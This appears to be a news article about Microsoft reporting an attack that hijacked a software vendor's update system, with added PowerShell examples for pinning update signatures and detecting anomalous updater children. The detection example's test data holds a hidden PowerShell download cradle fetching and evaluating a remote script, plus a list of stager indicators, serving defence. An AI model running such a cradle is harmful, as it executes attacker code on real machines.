Microsoft Warns of Cyber Attacks on a Third-Party Software Update System on Windows

Earlier this week, the research team behind Windows Defender Advanced Threat Protection (ATP) detected several attacks carried out against the update system of a software product whose name has not been revealed. All that is known about the software is that it is a well-known editing application and that its vendor was also targeted.

The consequences of the attack: According to Microsoft, by compromising the software's update system the attackers were able to gain remote access to specific targeted computers and to execute malware on them without the victims being aware of the infection. Because the malicious payload arrived through the same channel as legitimate updates, it inherited the trust that users and endpoint controls normally grant to the updater.

How the attack was carried out: Microsoft's researchers said that the attackers used PowerShell scripts combined with the Meterpreter reverse shell. This allowed them to infiltrate the target silently, so the victim was not aware that his or her system had been compromised. Microsoft also noted that the same technique, hijacking a trusted update mechanism, has been used before in high-profile attacks against high-value targets.

Previous attacks of this kind include the compromise of the update process of Altair Technologies' EvLog, of SimDisk (an automatic update system for a South Korean software product) and of the update server of ESTsoft's ALZip compression application.

PowerShell activities as detected by Windows Defender ATP

Was the issue resolved? Fortunately, the researchers discovered the attacks early on, which enabled them to work with the security teams of the targeted organisations to contain the effects of the attack. The response also involved the developers and the third-party software vendor, who were able to stop the attacks in time.

Microsoft's advice: Noting that such attacks have been carried out in the past, Microsoft's security researchers advised third-party software vendors to be more careful when building update systems. They specifically pointed out the need for stronger security in automated update mechanisms, saying that robust cryptographic protection is necessary if such attacks are to be prevented in the future. Encrypting the download channel alone is not enough: if the update server itself is compromised, the attacker's binary is delivered over a perfectly valid TLS connection.

Furthermore, Microsoft said that updaters should not blindly execute whatever they download, and that vendors should always validate the digital signature of an update against their own certificate before running it. Checking merely that a file is "signed by someone trusted" is not sufficient, since an attacker can obtain or steal some other valid code-signing certificate; the check has to pin the signer to the vendor's own certificate.
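As an added example of the check Microsoft is asking for (this is not code from the article, from Microsoft or from the affected vendor), the following PowerShell function verifies a downloaded installer before an updater runs it. It uses the built-in Get-AuthenticodeSignature cmdlet, first requiring that the signature is valid (chains to a trusted root and still matches the file's hash) and then pinning the signer's certificate thumbprint to the vendor's own code-signing certificate. The installer path, the thumbprint value and the updater itself are hypothetical placeholders.

```powershell
# Added example, not the article's or any vendor's updater code.
# Assumes a hypothetical updater that has just downloaded an installer to
# $UpdatePath. The pinned thumbprint below is a placeholder, not a real value.

function Test-UpdateSignature {
    param(
        [Parameter(Mandatory)] [string] $UpdatePath,
        [Parameter(Mandatory)] [string] $ExpectedThumbprint
    )

    $sig = Get-AuthenticodeSignature -FilePath $UpdatePath

    # 1. The file must carry an Authenticode signature that chains to a trusted
    #    root and whose hash still matches the file (Status 'Valid').
    #    'NotSigned', 'HashMismatch' and 'NotTrusted' all mean: do not run it.
    if ($sig.Status -ne 'Valid') {
        Write-Warning "Rejecting $UpdatePath : signature status is $($sig.Status) ($($sig.StatusMessage))"
        return $false
    }

    # 2. A valid signature alone is not enough. Whoever controls the update
    #    server can ship a binary signed with *some* trusted certificate, so
    #    pin the signer to the vendor's own certificate thumbprint.
    $actual = $sig.SignerCertificate.Thumbprint
    if ($actual -ne $ExpectedThumbprint) {
        Write-Warning "Rejecting $UpdatePath : signed by $actual, expected $ExpectedThumbprint"
        return $false
    }

    return $true
}

# Usage inside the updater: after download, before execution.
$pinnedThumbprint = '0000000000000000000000000000000000000000'   # placeholder for the vendor's code-signing cert thumbprint
$installer        = Join-Path $env:TEMP 'editor-update.exe'      # hypothetical downloaded update

if (Test-UpdateSignature -UpdatePath $installer -ExpectedThumbprint $pinnedThumbprint) {
    Start-Process -FilePath $installer -ArgumentList '/quiet' -Wait
} else {
    Write-Error 'Update rejected; leaving the installed version in place.'
}
```

The order of the two checks matters: Get-AuthenticodeSignature returns a null SignerCertificate for an unsigned file, so the status test has to come first. The thumbprint comparison is the part that defeats a compromised update server; the status test only defeats tampering with a file that was signed correctly.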

Windows Defender ATP detecting anomalous updater behavior
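The behaviour Windows Defender ATP flagged, an updater spawning PowerShell with download-cradle and Meterpreter-stager style arguments, is easy to express as a hunting rule over process-creation telemetry. The example below is added here and is not the article's or Windows Defender ATP's detection logic; the event records are constructed to resemble Sysmon event 1 / Security 4688 data, and every path, process name and host is hypothetical.

```powershell
# Added example; a heuristic, not the actual Windows Defender ATP detection.
# The three events are constructed test data resembling process-creation
# telemetry. Paths, hosts and the 'Editor' product name are hypothetical.

$events = @(
    [pscustomobject]@{ Time = '09:14:03'; ParentImage = 'C:\Program Files\Editor\updater.exe'
                       Image = 'C:\Program Files\Editor\setup.exe'
                       CommandLine = 'setup.exe /quiet' }
    [pscustomobject]@{ Time = '09:14:07'; ParentImage = 'C:\Program Files\Editor\updater.exe'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -NoP -W Hidden -C "IEX (New-Object Net.WebClient).DownloadString(''http://192.0.2.10/stage.ps1'')"' }
    [pscustomobject]@{ Time = '09:20:11'; ParentImage = 'C:\Windows\explorer.exe'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -File C:\Users\alice\scripts\backup.ps1' }
)

# Script hosts an updater normally has no reason to launch.
$scriptHosts = @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe')

# Command-line patterns typical of PowerShell download cradles and
# in-memory stagers such as the Meterpreter reverse shell (case-insensitive regex).
$indicators = @(
    '-enc(odedcommand)?\b'
    '-w(indowstyle)?\s+hidden'
    '\biex\b'
    'invoke-expression'
    'downloadstring'
    'downloadfile'
    'frombase64string'
)

function Find-AnomalousUpdaterChild {
    param([Parameter(Mandatory)] [object[]] $Events)

    foreach ($e in $Events) {
        $parent = [IO.Path]::GetFileName($e.ParentImage)
        $child  = [IO.Path]::GetFileName($e.Image)
        $cmd    = $e.CommandLine

        # Only processes spawned by an updater are of interest here.
        if ($parent -notmatch 'updat') { continue }
        if ($scriptHosts -notcontains $child) { continue }

        $hits = $indicators | Where-Object { $cmd -match $_ }
        if ($hits) {
            [pscustomobject]@{ Time = $e.Time; Parent = $parent; Child = $child
                               Indicators = ($hits -join ', '); CommandLine = $cmd }
        }
    }
}

# Only the 09:14:07 event is reported: updater.exe -> powershell.exe with a
# hidden window and a DownloadString/IEX cradle. The benign setup.exe child
# and the user's own backup script are left alone.
Find-AnomalousUpdaterChild -Events $events | Format-List
```

In a real deployment the parent match would be a list of known updater binaries rather than the substring 'updat', and a legitimate updater that does run PowerShell would need an allow-list of its expected command lines; the point of the rule is that an updater launching a hidden PowerShell that fetches and evaluates remote code is anomalous regardless of how trusted the updater itself is.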

"Its early discovery allowed incident responders – a collaboration of security experts from the targeted industries and developers working for the third-party software vendor – to work with Microsoft security researchers to promptly identify and neutralize the activities associated with this cyber espionage campaign," according to Microsoft.

A piece of advice: Disguising malware as a software update is a well-established technique. It is therefore recommended that you only install updates from trusted sources for legitimately obtained software, and that you treat automatic updates with caution. Bear in mind, however, that disabling automatic updates also delays security patches; the more robust fix lies with vendors, who must make their updaters verify the signature of every update against their own certificate before executing it.


Jahanzaib Hassan